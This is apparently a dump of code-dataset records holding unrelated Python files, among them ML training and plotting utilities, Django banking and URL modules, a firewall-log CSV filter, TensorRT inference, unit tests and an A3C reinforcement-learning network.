best_run_dir = exp.get_best_logdir(eval_metric, mode='min')\n best_run_file = os.path.join(best_run_dir, 'progress.csv')\n best_run = pd.read_csv(best_run_file)\n\n print(f'Best run ID: {best_run_dir}')\n\n for f in ['json', 'pkl']:\n in_file = os.path.join(best_run_dir, f'params.{f}')\n out_file = os.path.join(summary_dir, f'best_params.{f}')\n \n copyfile(in_file, out_file)\n\n # Plot runs.\n plot_all(runs, eval_metric, os.path.join(summary_dir, 'all_runs.png'))\n plot_single(best_run, eval_metric, os.path.join(\n summary_dir, 'best_run.png'))\n\ndef plot_all(runs: pd.core.frame.DataFrame, metric: str, savepath: str) -> None:\n fig, ax = plt.subplots(1, 2, figsize=(\n 8, 6), sharex=True, sharey='row', gridspec_kw={'wspace': 0, 'hspace': 0})\n box = dict(facecolor='yellow', pad=6, alpha=0.2)\n\n ax[0].text(\n 1.0, 1.0, 'HYPERBAND OPTIMIZATION', transform=ax[0].transAxes,\n 
horizontalalignment='center', verticalalignment='bottom', fontweight='bold')\n ax[0].text(\n 0.5, 0.98, 'TRAINING', transform=ax[0].transAxes,\n horizontalalignment='center', verticalalignment='top', bbox=box)\n ax[1].text(\n 0.5, 0.98, 'VALIDATION', transform=ax[1].transAxes,\n horizontalalignment='center', verticalalignment='top', bbox=box)\n\n train_name = DEFAULT_TRAIN_METRIC\n valid_name = DEFAULT_VALID_METRIC\n\n runs.groupby(['uid']).plot(\n x='epoch', y=train_name, ax=ax[0], legend=False)\n runs.groupby(['uid']).plot(\n x='epoch', y=valid_name, ax=ax[1], legend=False)\n\n ymin = np.min((\n np.min(runs[train_name]),\n np.min(runs[valid_name]))) * 0.9\n ymax = np.max(\n (np.percentile(runs[train_name], 95), np.percentile(runs[valid_name], 95)))\n xmin = np.min(runs['epoch'])-np.max(runs['epoch'])*0.01\n xmax = np.max(runs['epoch'])*1.01\n\n ax[0].set_xlim(xmin, xmax)\n ax[0].set_ylim(ymin, ymax)\n ax[0].yaxis.set_label_coords(-0.15, 0.5, transform=ax[0].transAxes)\n ax[0].set_ylabel('loss', bbox=box)\n\n fig.savefig(savepath, bbox_inches='tight', dpi=200, transparent=True)\n\n\ndef plot_single(single_run: pd.core.frame.DataFrame, metric: str, savepath: str) -> None:\n fig, ax = plt.subplots(1, 2, figsize=(\n 8, 6), sharex=True, sharey='row', gridspec_kw={'wspace': 0, 'hspace': 0})\n box = dict(facecolor='yellow', pad=6, alpha=0.2)\n\n ax[0].text(\n 1.0, 1.0, 'BEST RUN', transform=ax[0].transAxes,\n horizontalalignment='center', verticalalignment='bottom', fontweight='bold')\n ax[0].text(\n 0.5, 0.98, 'TRAINING', transform=ax[0].transAxes,\n horizontalalignment='center', verticalalignment='top', bbox=box)\n ax[1].text(\n 0.5, 0.98, 'EVALUATION', transform=ax[1].transAxes,\n horizontalalignment='center', verticalalignment='top', bbox=box)\n\n train_name = DEFAULT_TRAIN_METRIC\n valid_name = DEFAULT_VALID_METRIC\n\n single_run.plot(x='epoch', y=train_name, ax=ax[0], legend=False)\n single_run.plot(x='epoch', y=valid_name, ax=ax[1], legend=False)\n\n ymin = np.min((np.min(single_run[train_name]), np.min(\n single_run[valid_name]))) * 0.95\n ymax = np.max((np.percentile(single_run[train_name], 95), np.percentile(\n single_run[valid_name], 95)))\n xmin = np.min(single_run['epoch'])-np.max(single_run['epoch'])*0.01\n xmax = np.max(single_run['epoch'])*1.01\n\n ax[0].set_xlim(xmin, xmax)\n ax[0].set_ylim(ymin, ymax)\n ax[0].yaxis.set_label_coords(-0.15, 0.5, transform=ax[0].transAxes)\n ax[0].set_ylabel('loss', bbox=box)\n\n fig.savefig(savepath, bbox_inches='tight', dpi=200, transparent=True)\n","sub_path":"src/utils/summarize_runs.py","file_name":"summarize_runs.py","file_ext":"py","file_size_in_byte":5477,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"633716451","text":"from django.urls import path\n\nfrom rest_framework_simplejwt.views import TokenRefreshView\n\nfrom . 
import views\n\napp_name = 'user'\n\nurlpatterns = [\n path('login/', views.UserLoginApiView.as_view(), name='login'),\n path('token/refresh/', TokenRefreshView.as_view(), name='token_refresh'),\n path('google/token/', views.google_login_token, name='google-token'),\n path('me/', views.UserRetrieveUpdateApiView.as_view(), name='me')\n]\n","sub_path":"user_panel/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":439,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"530891854","text":"from django.db import models, transaction\n\n\nclass MoneyField(models.DecimalField):\n \"\"\"Use decimal for money, floating point is a no-no.\"\"\"\n def __init__(self, **kwargs):\n kwargs['max_digits'] = 20\n kwargs['decimal_places'] = 2\n return super(MoneyField, self).__init__(**kwargs)\n\n\nclass Customer(models.Model):\n \"\"\"Customer metadata\"\"\"\n name = models.CharField(max_length=100)\n\n\nclass Account(models.Model):\n \"\"\"Individual account owned by a customer. IDs are unique.\"\"\"\n owner = models.ForeignKey('Customer')\n balance = MoneyField()\n\n\nclass Transfer(models.Model):\n \"\"\"\n Record of a money transfer between accounts.\n\n For auditing and because it is likely that when we display transactions\n we will want to show the value of the account at the time, we also store\n the value of the accounts prior to the transfer.\n \"\"\"\n from_account = models.ForeignKey('Account',\n related_name='from_account_transfers',\n db_index=True)\n to_account = models.ForeignKey('Account',\n related_name='to_account_transfers',\n db_index=True)\n previous_from_balance = MoneyField()\n previous_to_balance = MoneyField()\n amount = MoneyField()\n time = models.DateTimeField(auto_now=True)\n\n\ndef create_account(customer_id, deposit):\n \"\"\"Creates a new account for a customer, returns the ID.\"\"\"\n account = Account.objects.create(owner_id=customer_id, balance=deposit)\n return account.id\n\n\ndef get_accounts(customer_id):\n \"\"\"Returns a list of all accounts owned by the customer.\"\"\"\n customer = Customer.objects.get(id=customer_id)\n return [a.id for a in customer.account_set.iterator()]\n\n\ndef transfer_money(from_account_id, to_account_id, amount):\n \"\"\"\n Move money between two accounts.\n\n Note that there is no checking for whether money is available. We assume\n this is okay because a bank employee is doing the operation and overdrafts\n are fine. If it were a customer, we would still allow it but change them a\n ridiculous fee.\n \"\"\"\n from_account = Account.objects.get(id=from_account_id)\n to_account = Account.objects.get(id=to_account_id)\n transfer = Transfer.objects.create(\n from_account_id = from_account_id,\n to_account_id = to_account_id,\n previous_from_balance = from_account.balance,\n previous_to_balance = to_account.balance,\n amount = amount\n )\n # Do updates atomically. 
The previous balances could be off.\n # Depending on the DB backend it's probably possible to do some\n # SELECT FOR UPDATE locking trickery or similar to guarantee\n # consistency.\n with transaction.atomic():\n affected = Account.objects.filter(id=from_account_id)\\\n .update(balance=models.F('balance') - amount)\n if affected != 1:\n raise ValueError('Atomic update failed')\n affected = Account.objects.filter(id=to_account_id)\\\n .update(balance=models.F('balance') + amount)\n if affected != 1:\n raise ValueError('Atomic update failed')\n return transfer.previous_from_balance, transfer.previous_to_balance\n\n\ndef get_balance(account_id):\n \"\"\"Returns the current dollar value of an account.\"\"\"\n account = Account.objects.get(id=account_id)\n return account.balance\n\n\ndef get_transfer_history(account_id):\n \"\"\"Returns all transfers involving the given account.\"\"\"\n account = Account.objects.get(id=account_id)\n transfers = list()\n transfers.extend(account.from_account_transfers.iterator())\n transfers.extend(account.to_account_transfers.iterator())\n transfers.sort(key=lambda x: x.time, reverse=True)\n return [{\n 'from_account_id': t.from_account_id,\n 'to_account_id': t.to_account_id,\n 'previous_from_balance': t.previous_from_balance,\n 'previous_to_balance': t.previous_to_balance,\n 'amount': t.amount,\n 'time': t.time\n } for t in transfers]\n","sub_path":"employee/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":4058,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"286249734","text":"#!/usr/bin/env python3\n\n### Copyright 2017 Adam Maynard\n### Licensed under the Apache License, Version 2.0 (the \"License\");\n### you may not use this file except in compliance with the License.\n### You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0\n\n# Build for PAN-OS 8\n\n## Export Palo Alto threat log as csv, then use this to filter the junk\nimport pandas as pd\n#Rename your csv file and remove \".csv\" if you want to append later\ninfile = input(\"Enter the CSV file location (E:/Users/someuser/somefile.csv): \")\n#savefile = input(\"Enter the CSV save file location (E:/Users/someuser/savefile.csv): \")\nf=pd.read_csv(infile)\nkeep_col = ['Receive Time','Source address','Destination address','Application','Repeat Count','Source Port','Destination Port','IP Protocol','URL/Filename','Threat/Content Name','Source Country','Destination Country']\nnew_f = f[keep_col]\nnew_f.to_csv(infile + \"-log.csv\", index=False)\n","sub_path":"csv-filter-threat-8_old.py","file_name":"csv-filter-threat-8_old.py","file_ext":"py","file_size_in_byte":941,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"505193678","text":"import torch\nimport torch.nn as nn\nfrom easydict import EasyDict as edict\nfrom pathlib import Path\nimport torchvision.transforms as trans\n\ndef get_basic_config():\n conf = edict()\n conf.data_path = Path('/home/zzh/dataset/faces_emore/imgs')\n conf.valid_path = Path('/home/zzh/faces_emore')\n conf.work_space = Path('work')\n conf.model_path = conf.work_space / 'models'\n\n conf.input_size = [112, 112]\n conf.embedding_size = 512\n\n conf.net_mode = 'ir_se' # 'ir' or 'ir_se'\n conf.net_depth = 50\n conf.drop_ratio = 0.6\n conf.device = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\n # conf.device = torch.device('cpu')\n conf.test_transform = trans.Compose([\n trans.ToTensor(),\n 
trans.Normalize([0.5,0.5,0.5], [0.5,0.5,0.5])\n ])\n conf.data_mode = 'faces_emore'\n conf.batch_size = 100 # irse net depth 50\n\n # --------------------Training Config ------------------------\n conf.log_path = conf.work_space / 'log'\n conf.save_path = conf.work_space / 'save'\n\n conf.lr = 1e-3\n conf.milestones = [12, 15, 18]\n conf.momentum = 0.9\n conf.pin_memory = True\n conf.num_workers = 3\n conf.ce_loss = nn.CrossEntropyLoss()\n\n # --------------------Inference Config ------------------------\n conf.facebank_path = conf.data_path / 'facebank'\n conf.threshold = 1.5 # margin m\n conf.face_limit = 10\n conf.min_face_size = 30\n\n return conf\n\nif __name__ == '__main__':\n args = get_config()\n print(args.epochs)","sub_path":"basic_config.py","file_name":"basic_config.py","file_ext":"py","file_size_in_byte":1519,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"567730468","text":"import os\nimport sys\n\nfile_path = sys.argv[1]\nout_file_path = sys.argv[2]\n\ncolumn_size_dict = {}\n\n# Build a dictionary with the column index as key and width of the column as value\nwith open(file_path, 'rb') as my_file:\n header_items = my_file.readline().rstrip(b\"\\n\").split(b\"\\t\")\n\n # Start with a default width of 1, which accounts for the padding at the right\n for i in range(len(header_items)):\n column_size_dict[i] = 1\n\n# Iterate through the lines to find the max width for each column\nwith open(file_path, 'rb') as my_file:\n for line in my_file:\n line_items = line.rstrip(b\"\\n\").split(b\"\\t\")\n\n for i in range(len(line_items)):\n column_size_dict[i] = max([column_size_dict[i], len(line_items[i]) + 1])\n\n# Save the data to an output file with the proper padding\nwith open(file_path, 'rb') as my_file:\n with open(out_file_path, 'wb') as out_file:\n for line in my_file:\n line_items = line.rstrip(b\"\\n\").split(b\"\\t\")\n\n line_out = \"\"\n for i in sorted(column_size_dict.keys()):\n format_string = \"{:<\" + str(column_size_dict[i]) + \"}\"\n column_value = format_string.format(line_items[i].decode())\n line_out += column_value\n\n out_file.write(line_out[:-1].encode() + b\"\\n\")\n","sub_path":"ConvertTsvToFixedWidthFile.py","file_name":"ConvertTsvToFixedWidthFile.py","file_ext":"py","file_size_in_byte":1312,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"500777493","text":"# -*- coding: utf-8 -*-\nfrom collections import namedtuple\nimport torch\nimport tensorrt as trt\nimport acap3d, acap\nimport numpy as np\nimport pycuda.driver as cuda\nimport pycuda.autoinit\nfrom pycuda.compiler import SourceModule\nimport os\n\n\nclass ServerApi(object):\n def __init__(self, gpu_id=0):\n self.d = np.load('../dictlshi.npy').tolist()\n self.dtype = np.float32\n self.final_shape = (4, 448, 448)\n self.batch_size = 4\n\n TRT_LOGGER = trt.Logger(trt.Logger.INFO)\n runtime = trt.Runtime(TRT_LOGGER)\n # resnet-101-aic-448-9000-b32-f640 res101-encode30-pytorch-b32-f640\n # f = open('/data/resnet-101-aic-448-9190-b4-b32-f128.engine', 'rb')\n f1 = open('../resnet-101-aic-448-acapfixall-9556-b32-f128-max2.engine', 'rb')\n self.engine1 = runtime.deserialize_cuda_engine(f1.read())\n f2 = open('../resnet-101-aic-448-acapfixall-9556-b32-f128-max2.engine', 'rb')\n self.engine2 = runtime.deserialize_cuda_engine(f2.read())\n f3 = open('../resnet-101-aic-448-acapfixall-9538-b32-f128.engine', 'rb')\n self.engine3 = runtime.deserialize_cuda_engine(f3.read())\n f4 = 
open('../resnet-101-aic-448-acapfixall-9556-b32-f128.engine', 'rb')\n self.engine4 = runtime.deserialize_cuda_engine(f4.read())\n\n self.input_shape1 = [self.batch_size, *self.engine1.get_binding_shape(0)]\n self.output_shape1 = [self.batch_size, *self.engine1.get_binding_shape(1)]\n self.output_shape2 = [self.batch_size, *self.engine2.get_binding_shape(1)]\n self.output_shape3 = [self.batch_size, *self.engine3.get_binding_shape(1)]\n self.output_shape4 = [self.batch_size, *self.engine4.get_binding_shape(1)]\n print(self.output_shape2)\n print(self.output_shape1)\n print(self.input_shape1)\n self.h_input1 = cuda.pagelocked_empty(self.input_shape1, dtype=np.float32)\n self.h_output1 = cuda.pagelocked_empty(self.output_shape1, dtype=np.float32)\n self.h_output2 = cuda.pagelocked_empty(self.output_shape2, dtype=np.float32)\n self.h_output3 = cuda.pagelocked_empty(self.output_shape3, dtype=np.float32)\n self.h_output4 = cuda.pagelocked_empty(self.output_shape4, dtype=np.float32)\n # Allocate device memory for inputs and outputs.\n self.d_input1 = cuda.mem_alloc(self.h_input1.nbytes)\n self.d_output1 = cuda.mem_alloc(self.h_output1.nbytes)\n self.d_output2 = cuda.mem_alloc(self.h_output2.nbytes)\n self.d_output3 = cuda.mem_alloc(self.h_output3.nbytes)\n self.d_output4 = cuda.mem_alloc(self.h_output4.nbytes)\n # Create a self.stream in which to copy inputs/outputs and run inference.\n self.stream1 = cuda.Stream()\n self.stream2 = cuda.Stream()\n self.stream3 = cuda.Stream()\n self.stream4 = cuda.Stream()\n # self.stream = trt.\n self.context1 = self.engine1.create_execution_context()\n self.context2 = self.engine2.create_execution_context()\n self.context3 = self.engine3.create_execution_context()\n self.context4 = self.engine4.create_execution_context()\n\n self.buf = np.zeros((self.final_shape[0], 2000, 2000, 3), dtype=np.uint8)\n # self.clip = np.zeros((self.final_shape[0], 3, self.resize_shape[0], self.resize_shape[1]), dtype=self.dtype)\n\n self.cap = acap3d.acap3d()\n # videolist = ['/data/231125424.mp4', '/data/963193352.mp4']\n # for i in range(50):\n # video = videolist[i%2]\n # self.cap.decode(video, self.final_shape[0], self.final_shape[1], 1, self.h_input.ctypes._data,\n # self.buf.ctypes._data)\n\n def handle(self, video_dir):\n # print('before decode')\n self.cap.decode(video_dir, self.final_shape[0], self.final_shape[1], 1, self.h_input1.ctypes._data, self.buf.ctypes._data)\n # print('after decode')\n cuda.memcpy_htod_async(self.d_input1, self.h_input1, self.stream1)\n # Run inference.\n # print('before exec')\n self.context1.execute(batch_size=2, bindings=[int(self.d_input1), int(self.d_output1)])\n self.context2.execute(batch_size=2, bindings=[int(self.d_input1), int(self.d_output2)])\n # self.context1.execute_async(batch_size=4, bindings=[int(self.d_input1), int(self.d_output1)],\n # stream_handle=self.stream1.handle)\n\n # self.context2.execute_async(batch_size=2, bindings=[int(self.d_input1), int(self.d_output2)],\n # stream_handle=self.stream2.handle)\n #\n # self.context3.execute_async(batch_size=1, bindings=[int(self.d_input1), int(self.d_output3)],\n # stream_handle=self.stream3.handle)\n #\n # self.context4.execute_async(batch_size=1, bindings=[int(self.d_input1), int(self.d_output4)],\n # stream_handle=self.stream4.handle)\n\n # Transfer predictions back from the GPU.\n cuda.memcpy_dtoh_async(self.h_output1, self.d_output1, self.stream1)\n cuda.memcpy_dtoh_async(self.h_output2, self.d_output2, self.stream2)\n # cuda.memcpy_dtoh_async(self.h_output3, self.d_output3, 
self.stream3)\n # cuda.memcpy_dtoh_async(self.h_output4, self.d_output4, self.stream4)\n # Synchronize the self.stream\n self.stream1.synchronize()\n self.stream2.synchronize()\n # self.stream3.synchronize()\n # self.stream4.synchronize()\n # print(self.h_output2.shape)\n prob1 = self.h_output1.mean(0).mean(-1).mean(-1)\n prob2 = self.h_output2.mean(0).mean(-1).mean(-1)\n # prob3 = self.h_output3.mean(0).mean(-1).mean(-1)\n # prob4 = self.h_output4.mean(0).mean(-1).mean(-1)\n # prob = prob1 + prob2+ prob3+ prob4\n prob = prob1 + prob2\n # prob = prob1\n pred = np.argsort(prob)[::-1][0]\n print(pred)\n # if isinstance(self.d[pred], tuple):\n # res = list(self.d[pred])\n # else:\n # res = list([self.d[pred]])\n # print(res)\n res = self.d[pred]\n return res\n\n\nif __name__ == '__main__':\n import line_profiler\n\n file = '../231125424.mp4'\n s = ServerApi()\n # s.handle('../231125424.mp4')\n profile = line_profiler.LineProfiler(s.handle)\n profile.run('s.handle(file)')\n profile.print_stats()\n","sub_path":"aic_tensorrt_acap_2s/infer/infer.py","file_name":"infer.py","file_ext":"py","file_size_in_byte":6368,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"375826331","text":"from pretalx.orga.signals import nav_event\n\n\ndef orga_events(request):\n \"\"\"\n Adds data to all template contexts\n \"\"\"\n\n _nav_event = []\n if getattr(request, 'event', None) and request.user.is_authenticated:\n for receiver, response in nav_event.send(request.event, request=request):\n _nav_event += response\n\n return {'nav_event': _nav_event}\n","sub_path":"src/pretalx/orga/context_processors.py","file_name":"context_processors.py","file_ext":"py","file_size_in_byte":376,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"166365928","text":"import mock\nimport unittest\n\nimport numpy\nfrom six.moves import cPickle\n\nfrom smqtk.representation.descriptor_element.local_elements import \\\n DescriptorFileElement\n\n\nclass TestDescriptorFileElement (unittest.TestCase):\n\n def test_configuration1(self):\n default_config = DescriptorFileElement.get_default_config()\n self.assertEqual(default_config,\n {\n 'save_dir': None,\n 'subdir_split': None,\n })\n\n default_config['save_dir'] = '/some/path/somewhere'\n default_config['subdir_split'] = 4\n\n #: :type: DescriptorFileElement\n inst1 = DescriptorFileElement.from_config(default_config,\n 'test', 'abcd')\n self.assertEqual(default_config, inst1.get_config())\n self.assertEqual(inst1._save_dir, '/some/path/somewhere')\n self.assertEqual(inst1._subdir_split, 4)\n\n # vector-based equality\n inst2 = DescriptorFileElement.from_config(inst1.get_config(),\n 'test', 'abcd')\n self.assertEqual(inst1, inst2)\n\n def test_vec_filepath_generation(self):\n d = DescriptorFileElement('test', 'abcd', '/base', 4)\n self.assertEqual(d._vec_filepath,\n '/base/a/b/c/test.abcd.vector.npy')\n\n d = DescriptorFileElement('test', 'abcd', '/base', 2)\n self.assertEqual(d._vec_filepath,\n '/base/ab/test.abcd.vector.npy')\n\n d = DescriptorFileElement('test', 'abcd', '/base', 1)\n self.assertEqual(d._vec_filepath,\n '/base/test.abcd.vector.npy')\n\n d = DescriptorFileElement('test', 'abcd', '/base', 0)\n self.assertEqual(d._vec_filepath,\n '/base/test.abcd.vector.npy')\n\n d = DescriptorFileElement('test', 'abcd', '/base')\n self.assertEqual(d._vec_filepath,\n '/base/test.abcd.vector.npy')\n\n def test_serialization(self):\n # Test that an instance can be serialized and 
deserialized via pickle\n # successfully.\n ex_type = 'test'\n ex_uid = 12345\n ex_save_dir = 'some-dir'\n ex_split = 5\n e1 = DescriptorFileElement(ex_type, ex_uid, ex_save_dir, ex_split)\n\n # pickle dump and load into a new copy\n #: :type: DescriptorFileElement\n e2 = cPickle.loads(cPickle.dumps(e1))\n # Make sure the two have the smme attributes, including base descriptor\n # element things.\n self.assertEqual(e1.type(), e2.type())\n self.assertEqual(e1.uuid(), e2.uuid())\n self.assertEqual(e1._save_dir, e2._save_dir)\n self.assertEqual(e1._subdir_split, e2._subdir_split)\n self.assertEqual(e1._vec_filepath, e2._vec_filepath)\n\n @mock.patch('smqtk.representation.descriptor_element.local_elements'\n '.numpy.save')\n @mock.patch('smqtk.representation.descriptor_element.local_elements'\n '.file_utils.safe_create_dir')\n def test_vector_set(self, mock_scd, mock_save):\n d = DescriptorFileElement('test', 1234, '/base', 4)\n self.assertEqual(d._vec_filepath,\n '/base/1/2/3/test.1234.vector.npy')\n\n v = numpy.zeros(16)\n d.set_vector(v)\n mock_scd.assert_called_with('/base/1/2/3')\n mock_save.assert_called_with('/base/1/2/3/test.1234.vector.npy', v)\n\n @mock.patch('smqtk.representation.descriptor_element.local_elements'\n '.numpy.load')\n def test_vector_get(self, mock_load):\n d = DescriptorFileElement('test', 1234, '/base', 4)\n self.assertFalse(d.has_vector())\n self.assertIs(d.vector(), None)\n\n d.has_vector = mock.Mock(return_value=True)\n self.assertTrue(d.has_vector())\n v = numpy.zeros(16)\n mock_load.return_value = v\n numpy.testing.assert_equal(d.vector(), v)\n","sub_path":"python/smqtk/tests/representation/DescriptorElement/test_DescriptorFileElement.py","file_name":"test_DescriptorFileElement.py","file_ext":"py","file_size_in_byte":3969,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"53853590","text":"# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\nclass Solution:\n def getDepth(self, root):\n d = 0\n while root.left:\n root = root.left\n d += 1\n return d\n\n def exists(self, root, d, ind):\n left = 0\n right = 2**d - 1\n\n node = root\n\n while left < right:\n pivot = left + (right - left) // 2\n if ind <= pivot:\n node = node.left\n right = pivot\n else:\n node = node.right\n left = pivot + 1\n\n return node\n\n def countNodes(self, root: TreeNode) -> int:\n if not root:\n return 0\n\n depth = self.getDepth(root)\n if depth == 0:\n return 1\n\n left = 0\n right = 2**depth - 1\n\n while left <= right:\n pivot = left + (right - left) // 2\n if self.exists(root, depth, pivot):\n left = pivot + 1\n else:\n right = pivot - 1\n\n return ( 2**depth - 1 ) + left\n\n\n \n","sub_path":"222_Count Complete Tree Nodes/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":1197,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"313292813","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nfrom hyper_parameters import *\nfrom global_parameters import *\n\nclass AcNet(object):\n '''\n Class: A3C network\n '''\n def __init__(self, scope, globalAC=None):\n '''\n :param scope: The network it belongs to\n :param globalAC: The global_net name\n '''\n self.SESS = get_value('SESS')\n self.OPT_A = get_value('OPT_A')\n self.OPT_C = get_value('OPT_C')\n\n if scope == GLOBAL_NET_SCOPE:\n '''Global_net initialization'''\n with 
tf.variable_scope(scope):\n self.s = tf.placeholder(dtype=tf.float32, shape=[None, N_S], name='S')\n self.a_params, self.c_params = self._build_net(scope)[-2:] ### the last 2 return of build_net function\n else:\n with tf.variable_scope(scope):\n self.s = tf.placeholder(dtype=tf.float32, shape=[None, N_S], name='S')\n self.a_his = tf.placeholder(dtype=tf.int32, shape=[None, N_A], name='A')\n self.v_target = tf.placeholder(dtype=tf.float32, shape=[None, 1], name='Vtarget')\n self.a_prob, self.v, self.a_params, self.c_params = self._build_net(scope)\n td = tf.subtract(self.v_target, self.v, name='TD_Error')\n\n with tf.name_scope('c_loss'):\n self.c_loss = tf.reduce_mean(tf.square(td))\n\n with tf.name_scope('a_loss'):\n log_prob = tf.reduce_sum(\n tf.log(self.a_prob + 1e-5) * tf.one_hot(indices=self.a_his, depth=N_A, dtype=tf.float32),\n axis=1,\n keep_dims=True)\n exp_v = log_prob * tf.stop_gradient(td)\n entropy = -tf.reduce_sum(self.a_prob * tf.log(self.a_prob + 1e-5),\n axis=1,\n keep_dims=True)\n self.exp_v = exp_v + ENTROPY_BETA * entropy\n self.a_loss = tf.reduce_mean(-self.exp_v)\n\n with tf.name_scope('local_grad'):\n self.a_grads = tf.gradients(self.a_loss, self.a_params)\n self.c_grads = tf.gradients(self.c_loss, self.c_params)\n\n with tf.name_scope('sync'):\n with tf.name_scope('pull'):\n self.pull_a_params = [l_p.assign(g_p) for l_p, g_p in zip(self.a_params, globalAC.a_params)]\n self.pull_c_params = [l_p.assign(g_p) for l_p, g_p in zip(self.c_params, globalAC.c_params)]\n with tf.name_scope('push'):\n self.push_a_params = self.OPT_A.apply_gradients(zip(self.a_grads, globalAC.a_params))\n self.push_c_params = self.OPT_C.apply_gradients(zip(self.c_grads, globalAC.c_params))\n\n def _build_net(self, scope):\n '''\n :param scope: The network it belongs to\n :return: a_prob (M * N), v, a_params, c_params\n '''\n with tf.variable_scope('actor'):\n ### Variable\n # W_a1 = tf.Variable(tf.truncated_normal([N_S, UNIT_A], stddev=0.5), dtype=tf.float32, name='W_a1')\n # b_a1 = tf.Variable(tf.zeros([UNIT_A]), dtype=tf.float32, name='b_a1')\n # W_a2 = tf.Variable(tf.truncated_normal([UNIT_A, UNIT_A], stddev=0.5), dtype=tf.float32, name='W_a2')\n # b_a2 = tf.Variable(tf.zeros([UNIT_A]), dtype=tf.float32, name='b_a2')\n # W_prob = tf.Variable(tf.truncated_normal([UNIT_A, N_A], stddev=0.5), dtype=tf.float32, name='W_prob')\n # b_prob = tf.Variable(tf.zeros([N_A]), dtype=tf.float32, name='b_prob')\n # activation = tf.nn.relu(tf.nn.bias_add(tf.matmul(self.s, W_a1),b_a1))\n layer_a1 = tf.layers.dense(inputs = self.s,\n units = UNIT_A,\n activation = tf.nn.relu6,\n kernel_initializer = W_INIT,\n name = 'layer_a1')\n layer_a2 = tf.layers.dense(inputs = layer_a1,\n units = UNIT_A,\n activation = tf.nn.relu6,\n kernel_initializer = W_INIT,\n name = 'layer_a2')\n a_prob = tf.layers.dense(inputs=layer_a2,\n units=N_A, ### N_A = M*N\n activation=tf.nn.sigmoid,\n kernel_initializer=W_INIT,\n name = 'a_prob')\n with tf.variable_scope('critic'):\n # W_c1 = tf.Variable(tf.truncated_normal([N_S, UNIT_C], stddev=0.2), dtype=tf.float32, name='W_c1')\n # b_c1 = tf.Variable(tf.zeros([UNIT_A]), dtype=tf.float32, name='b_c1')\n # W_c2 = tf.Variable(tf.truncated_normal([UNIT_C, UNIT_C], stddev=0.2), dtype=tf.float32, name='W_c2')\n # b_c2 = tf.Variable(tf.zeros([UNIT_A]), dtype=tf.float32, name='b_c2')\n # W_v = tf.Variable(tf.truncated_normal([UNIT_C, 1], stddev=0.2), dtype=tf.float32, name='W_v')\n # b_v = tf.Variable(tf.zeros([1]), dtype=tf.float32, name='b_v')\n layer_c1 = tf.layers.dense(inputs = self.s,\n 
units = UNIT_C,\n activation = tf.nn.relu6,\n kernel_initializer = W_INIT,\n name = 'layer_c1')\n layer_c2 = tf.layers.dense(inputs = layer_c1,\n units = UNIT_C,\n activation = tf.nn.relu6,\n kernel_initializer = W_INIT,\n name = 'layer_c2')\n v = tf.layers.dense(inputs = layer_c2,\n units = 1,\n kernel_initializer = W_INIT,\n name = 'v')\n a_params = tf.get_collection(key=tf.GraphKeys.TRAINABLE_VARIABLES, scope=scope + '/actor')\n c_params = tf.get_collection(key=tf.GraphKeys.TRAINABLE_VARIABLES, scope=scope + '/critic')\n return a_prob, v, a_params, c_params\n\n def choose_action(self, s): ## ?\n '''\n :param s: state\n :return: action\n '''\n action = self.SESS.run(self.a_prob, feed_dict={self.s: s[np.newaxis, :]})\n return action\n\n def pull_global(self):\n '''\n Pull operation: Pull the up-to-date parameters to the local_net from the global_net\n '''\n self.SESS.run([self.pull_a_params, self.pull_c_params])\n\n def update_global(self, feed_dict):\n '''\n Push operation: Push the up-to-date parameters to the global_net from the local_net\n Run by a local_net\n :param feed_dict: feed_dict\n '''\n self.SESS.run([self.push_a_params, self.push_c_params], feed_dict)\n\n\n\n","sub_path":"AcNet.py","file_name":"AcNet.py","file_ext":"py","file_size_in_byte":7026,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"573759708","text":"''' smem.py - one function, init memory from prelearned thots included in dna '''\n\nimport sam.mind\n\ndef initMemory():\n\tfriendhouse = sam.mind.Node('house').modify('of', 'friend')\n\tClaw('you', 'go').modify('where', friendhouse).modify('why', Claw('you', 'pickup', 'food'))\n\tClaw('Sam', 'go').modify('where', friendhouse).modify('why', Claw('Sam', 'deliver', 'food'))\n\tClaw('John', 'go').modify('where', friendhouse).modify('why', Claw('John', 'eat', 'food'))\n\tClaw('Naiyana', 'go').modify('where', 'Bangkok').modify('why', Claw('Naiyana', 'visit'))\n\tClaw('Sam', 'go').modify('where', 'Chiang_Mai').modify('why', 'vacation')\n\tClaw('John', 'go').modify('where', 'Pai').modify('why', Claw('John', 'go', 'embassy'))\n\tClaw('Juan', 'go').modify('where', 'bank').modify('why', Claw('Juan', 'get', 'money'))\n\n\tClaw('John', 'go').modify('where', 'coffeeshop').modify('why', Claw('John', 'drink', 'coffee'))\n\tClaw('Sam', 'go').modify('where', 'coffeeshop').modify('why', Claw('Sam', 'eat', 'breakfast'))\n\tClaw('Juan', 'go').modify('where', 'coffeeshop').modify('why', Claw('Juan', 'meet', 'friend'))\n\n\tdef work(who, where, whyv, whyo=None):\n\t\tClaw(who, 'go').modify('where', where).modify('why', Claw(who, whyv, 